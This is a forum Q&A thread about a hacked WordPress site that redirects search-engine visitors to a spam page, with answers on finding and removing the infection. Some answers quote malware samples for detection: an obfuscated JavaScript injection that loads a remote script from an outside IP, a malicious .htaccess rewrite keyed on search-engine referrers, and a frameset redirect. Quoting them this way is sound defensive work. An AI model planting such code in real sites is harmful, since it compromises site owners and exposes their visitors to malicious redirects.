0

We have the page domain.., and when you search at google.nl to Critical Alignment and click at the homepage of the site you are redirected after a couple of seconds to http://www.venusfactor.com/welcome/. We think the site is hacked, but can not find a redirect or anything.

Can someone help?

Coen
  • 461
  • 2
  • 11
  • 28

5 Answers5

0

Have you checked if the redirect is made where the domain is hosted? Don't know what kind of host you use, but maybe the domain is set to redirect to that page from the host's side.

Imbue
  • 399
  • 3
  • 14
0

A good guide on what to do when your site gets hacked is this: http://codex.wordpress.org/FAQ_My_site_was_hacked

For your issue, check .htaccess first. There might be some redirect lines on the farthest right side of the file, so use the horizontal scroll bar.

Also, I would suggest to check with your host, since there might be many more files affected.

Manolis
  • 893
  • 1
  • 14
  • 33
  • thanks for your reply, we did look in the htacces, but nothing in there. I am now downloading the site to have a look in other documents. Do you have other files you think could make the problem? when I look in the code of the page, I can't find anything – Coen Mar 31 '14 at 13:19
  • It seems to be fixed now? It doesn't redirect me anymore. Also, i remember that it redirected after a short delay. That could mean a redirect with javascript. Check your .js files for something like "window.location.href" – Manolis Mar 31 '14 at 13:40
  • Yes I saw there was extra code in de index.php and also an other file. Checking with Sucuri.net shows it has malware, but do not know exaclty which files are also wrong. Do you know there is a way to check which files are wrong? – Coen Mar 31 '14 at 13:51
  • If you have access to SSH and you know how to use it, then i would suggest to check the last modified files (http://stackoverflow.com/a/1404964/395160) or search the files that have the piece of string (or part of it) you found in that index.php file (http://stackoverflow.com/a/8010605/395160). If you're not good with SSH, then download http://www.mythicsoft.com/agentransack and check for that piece of string in the files you downloaded earlier – Manolis Mar 31 '14 at 14:14
0

The same thing happened to me also.

First i thought it was a DNS hack problem, since it was a redirection problem. The hosting company responded to me that the DNS had no problems. Tey checked other common problems to find the source of the redirection and I was told that I had a malitious script in the header.php file, in the active theme foloder.

I manually checked the file in cPanel and I found the script that caused the redirection. To read more about this check the article on IStartBlogging

Adrian T
  • 1
0

A new virus is spreading that is abusing the xmlrpc.php of wordpress to inject itself into the server and replace the javascript files with its own contaminated copies.

If you see too many xmlrpc requests POST requests from a suspicious ip-address, such as the below, verify the integrity of your javascript files.

$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

One key feature of this virus is, it primarily targets the jQuery.js, replacing it with its own version (that when users browsers to your site, automatically redirects them to clickbait articles).

It achieves this by first posting a new php files, such as recure.php which usually contain obfuscated php code, or uploading wordpress plugins to the upload folder.

Fawad Ali
  • 564
  • 6
  • 11
-1

Most probably the attackers are trying to redirect the page to a different web site if the referred pages are google, yahoo, msn, aol, bing.
They will give back a frameset( similar to iframe) when we request the pages from above-specified referrals.

 <frameset rows="*,0" framespacing="0" border="0" frameborder="NO" data-gr-c-s-loaded="true">
        <frame src="http://remote_site_address_here" noresize="" scrolling="auto">
        <link rel="stylesheet" type="text/css" href="chrome-extensionlink/content.css">
</frameset>

So we will see our website name at the top of the address bar but the site content will be different. These are the common files that the hackers used to inject suspicious code.

  1. index.php
  2. index.html
  3. header.php
  4. footer.php
  5. functions.php
  6. theme files
  7. .htaccess

Nowadays the recently infected cases are showing the malicious code injection is with .htaccess file. Here I am demonstrating the injected .htaccess file. Open your .htaccess file in the web root directory. And you can see this configurations

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]

Here they are redirecting to the malicious php file emilie-amethyst.php if the referral pages are google|yahoo|msn|aol|bing. This is the reason of that redirect issue.
So You have to remove this redirection configuration from your .htaccess file and also remove the malicious script (in this case it is emilie-amethyst.php).

Try to click the link from google search. still, if you see the problem, then remove all cookies related to this particular site and retry. It should solve the issue

ARUNBALAN NV
  • 1,634
  • 4
  • 17
  • 39